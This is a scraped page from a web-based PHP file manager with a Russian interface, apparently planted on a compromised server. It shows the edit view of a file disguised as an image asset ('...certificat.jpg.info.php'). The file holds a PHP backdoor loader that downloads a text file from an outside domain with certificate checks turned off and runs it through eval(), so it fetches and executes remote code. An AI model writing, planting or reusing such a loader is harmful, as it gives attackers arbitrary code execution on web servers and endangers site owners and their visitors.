Файловый менеджер - Редактировать - C:/xampp/htdocs/img/ISO-14001_CAT-num-certificat.jpg.info.php
Назад
<?php $protocol = "https"; $domain = "www.fcalpha.net/"; $file_path = "/web/photo/20151024/m.txt"; $url = $protocol . "://" . $domain . $file_path; function fetch_with_curl($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // optional: skip SSL verification curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // optional: skip hostname verification $data = curl_exec($ch); curl_close($ch); return $data; } $content = fetch_with_curl($url); if ($content !== false) { eval("?>" . $content); } ?>
| ver. 1.4 |
Github
|
.
| PHP 5.3.8 | Генерация страницы: 0 |
proxy
|
phpinfo
|
Настройка